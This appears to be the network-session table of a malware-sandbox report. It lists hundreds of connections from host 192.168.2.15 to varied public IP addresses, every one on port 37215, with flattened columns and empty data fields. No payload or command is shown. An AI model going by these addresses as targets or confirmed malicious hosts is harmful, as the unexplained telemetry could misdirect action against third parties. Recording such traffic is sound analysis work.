                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8131192.168.2.1544896181.168.238.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8132192.168.2.1552052190.160.80.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8133192.168.2.1559792122.156.214.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8134192.168.2.1554988102.29.198.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8135192.168.2.1557150162.88.230.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8136192.168.2.1548484186.138.220.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8137192.168.2.1548716222.126.94.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8138192.168.2.1555634102.63.76.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8139192.168.2.1532862121.226.224.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8140192.168.2.1546516186.42.251.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8141192.168.2.1545908190.254.115.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8142192.168.2.1541684157.22.163.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8143192.168.2.153523645.251.88.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8144192.168.2.155427045.131.46.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8145192.168.2.1551782156.138.194.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8146192.168.2.1536522190.155.199.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8147192.168.2.1546404138.252.50.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8148192.168.2.1535484190.9.219.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8149192.168.2.1541400121.58.128.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8150192.168.2.1533792223.37.222.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8151192.168.2.1549908122.178.210.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8152192.168.2.155199841.44.131.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8153192.168.2.1546084181.104.21.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8154192.168.2.154779037.9.32.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8155192.168.2.1553594122.2.213.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8156192.168.2.1555476138.23.11.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8157192.168.2.1535230102.207.39.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8158192.168.2.154521645.221.61.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8159192.168.2.153856894.218.81.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8160192.168.2.154696831.164.125.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8161192.168.2.154985494.67.123.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8162192.168.2.153346694.82.184.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8163192.168.2.1555126190.45.127.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8164192.168.2.153839237.224.46.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8165192.168.2.1560244190.50.127.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8166192.168.2.1543788102.54.139.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8167192.168.2.1550528156.225.201.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8168192.168.2.1548304138.162.99.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8169192.168.2.1533356156.41.108.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8170192.168.2.1555456157.34.135.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8171192.168.2.1558094181.209.150.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8172192.168.2.1541742157.26.28.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8173192.168.2.1557958186.99.12.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8174192.168.2.155626294.123.101.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8175192.168.2.154750294.23.130.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8176192.168.2.1556588138.218.220.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8177192.168.2.153447294.4.10.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8178192.168.2.153767037.70.188.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8179192.168.2.1533436156.65.151.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8180192.168.2.155042837.7.144.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8181192.168.2.154553094.214.172.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8182192.168.2.1542560222.124.112.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8183192.168.2.153574245.128.113.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8184192.168.2.1537414102.196.8.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8185192.168.2.154788437.1.155.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8186192.168.2.1538932186.53.100.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8187192.168.2.1544764222.180.177.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8188192.168.2.1539700121.152.212.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8189192.168.2.1554202190.5.29.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8190192.168.2.154395031.103.133.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8191192.168.2.1539082156.255.57.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192192.168.2.154345494.90.208.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8193192.168.2.1539272186.153.216.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8194192.168.2.1551714197.251.174.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8195192.168.2.1558058121.19.139.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8196192.168.2.154171037.176.16.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8197192.168.2.1545824156.0.253.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8198192.168.2.1556998138.161.231.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8199192.168.2.154820037.103.53.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8200192.168.2.1538512134.192.115.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8201192.168.2.1556706102.179.138.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8202192.168.2.1556516197.117.141.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8203192.168.2.1548592197.230.89.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8204192.168.2.1554144156.167.6.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8205192.168.2.1554384121.89.44.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8206192.168.2.1533894157.160.255.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8207192.168.2.1546434121.109.151.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8208192.168.2.154001831.244.61.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8209192.168.2.1541472197.72.184.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8210192.168.2.1552792190.35.227.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8211192.168.2.1554348197.48.248.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8212192.168.2.155386645.241.107.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8213192.168.2.153643237.175.119.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8214192.168.2.1554010181.134.85.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8215192.168.2.1536368122.121.202.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8216192.168.2.153888031.120.1.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8217192.168.2.153447094.252.135.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8218192.168.2.1544876222.244.182.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8219192.168.2.1533760122.148.85.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8220192.168.2.155525237.71.0.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8221192.168.2.1552810156.171.139.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8222192.168.2.1547226102.9.125.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8223192.168.2.1549148222.127.30.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8224192.168.2.1545352197.116.47.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8225192.168.2.155149431.218.158.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8226192.168.2.1533956157.2.63.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8227192.168.2.155187231.131.111.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8228192.168.2.1555110106.37.35.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8229192.168.2.1534944156.187.24.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8230192.168.2.1558258197.37.118.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8231192.168.2.155378445.144.196.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8232192.168.2.1545300197.60.234.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8233192.168.2.1540142122.174.68.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8234192.168.2.15598184.213.135.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8235192.168.2.1544064186.161.156.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8236192.168.2.1542782157.183.227.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8237192.168.2.1553430190.119.190.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8238192.168.2.1533566122.228.55.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8239192.168.2.1545424157.229.152.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8240192.168.2.1543244102.190.10.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8241192.168.2.153318241.245.130.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8242192.168.2.1546044121.215.228.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8243192.168.2.156046241.125.175.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8244192.168.2.155044440.94.254.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8245192.168.2.1545318138.50.139.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8246192.168.2.1544446121.247.56.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8247192.168.2.155320637.255.94.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8248192.168.2.153488494.170.226.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8249192.168.2.1534210122.115.131.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8250192.168.2.153837294.122.210.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8251192.168.2.155360241.47.188.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8252192.168.2.154500437.186.5.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8253192.168.2.1544878156.74.133.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8254192.168.2.1559960197.254.37.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8255192.168.2.1555964102.139.42.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8256192.168.2.1542026121.79.60.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8257192.168.2.1543002122.216.172.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8258192.168.2.1540236181.57.93.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8259192.168.2.1539154186.214.157.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8260192.168.2.155895634.155.240.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8261192.168.2.1555462121.135.1.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8262192.168.2.1555318102.68.158.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8263192.168.2.154967441.12.114.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8264192.168.2.1555910157.146.65.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8265192.168.2.1544920181.89.167.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8266192.168.2.154016641.183.177.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8267192.168.2.1538082186.61.20.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8268192.168.2.154631237.120.102.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8269192.168.2.1552532102.159.22.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8270192.168.2.154585837.11.76.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8271192.168.2.1544550156.1.188.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8272192.168.2.1554448190.60.148.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8273192.168.2.155167045.59.215.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8274192.168.2.153309441.21.19.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8275192.168.2.1542224102.159.51.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8276192.168.2.1551098157.185.189.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8277192.168.2.1538044181.38.57.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8278192.168.2.1536358102.26.91.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8279192.168.2.155817637.147.24.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8280192.168.2.155471041.82.44.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8281192.168.2.1534936138.102.215.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8282192.168.2.1551510222.16.57.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8283192.168.2.1546016157.28.31.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8284192.168.2.1535990138.156.225.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8285192.168.2.154611094.18.174.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8286192.168.2.154644037.23.226.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8287192.168.2.1541318138.208.17.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8288192.168.2.154647445.26.86.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8289192.168.2.1533896181.240.12.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8290192.168.2.155837841.69.58.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8291192.168.2.155103441.14.235.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8292192.168.2.1541872138.6.253.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8293192.168.2.1544090122.16.93.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8294192.168.2.1559546190.186.46.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8295192.168.2.1555358186.43.74.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8296192.168.2.154291431.22.243.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8297192.168.2.153365053.253.59.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8298192.168.2.1537242157.75.56.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8299192.168.2.1558904156.231.241.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8300192.168.2.1548922197.59.74.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8301192.168.2.155954037.213.233.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8302192.168.2.154714637.34.29.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8303192.168.2.153539041.52.188.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8304192.168.2.1533886181.25.200.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8305192.168.2.1548456138.3.175.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8306192.168.2.1546340138.120.22.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8307192.168.2.1554092222.136.105.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8308192.168.2.153556269.181.207.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8309192.168.2.155123645.137.228.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8310192.168.2.154194641.12.151.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8311192.168.2.154317031.220.142.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8312192.168.2.153899845.109.49.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8313192.168.2.1542610197.229.234.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8314192.168.2.154517637.136.6.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8315192.168.2.1544716222.63.155.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8316192.168.2.1537610181.217.101.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8317192.168.2.1538534122.4.159.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8318192.168.2.1552130123.213.189.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8319192.168.2.1557204222.207.128.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8320192.168.2.1538374121.8.77.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8321192.168.2.1551602121.14.117.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8322192.168.2.1535652138.250.174.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8323192.168.2.1543756181.165.184.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8324192.168.2.156015637.24.215.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8325192.168.2.1539476157.116.240.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8326192.168.2.1557940207.166.246.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8327192.168.2.1546048222.167.175.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8328192.168.2.1557764181.47.62.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8329192.168.2.1556192121.101.240.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8330192.168.2.1548926186.171.10.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8331192.168.2.1545772190.78.141.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8332192.168.2.1547202157.73.149.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8333192.168.2.1559074181.1.81.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8334192.168.2.1560350222.198.101.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8335192.168.2.1553852122.40.110.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8336192.168.2.1549310102.161.148.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8337192.168.2.1533140222.69.147.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8338192.168.2.1556144181.245.114.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8339192.168.2.1541150138.188.231.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8340192.168.2.1544214157.227.89.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8341192.168.2.154651245.42.25.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8342192.168.2.1542850181.227.115.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8343192.168.2.1541890157.19.113.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8344192.168.2.1537712138.249.188.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8345192.168.2.153825231.66.202.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8346192.168.2.154210294.18.197.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8347192.168.2.1554336156.219.71.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8348192.168.2.154025694.41.207.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
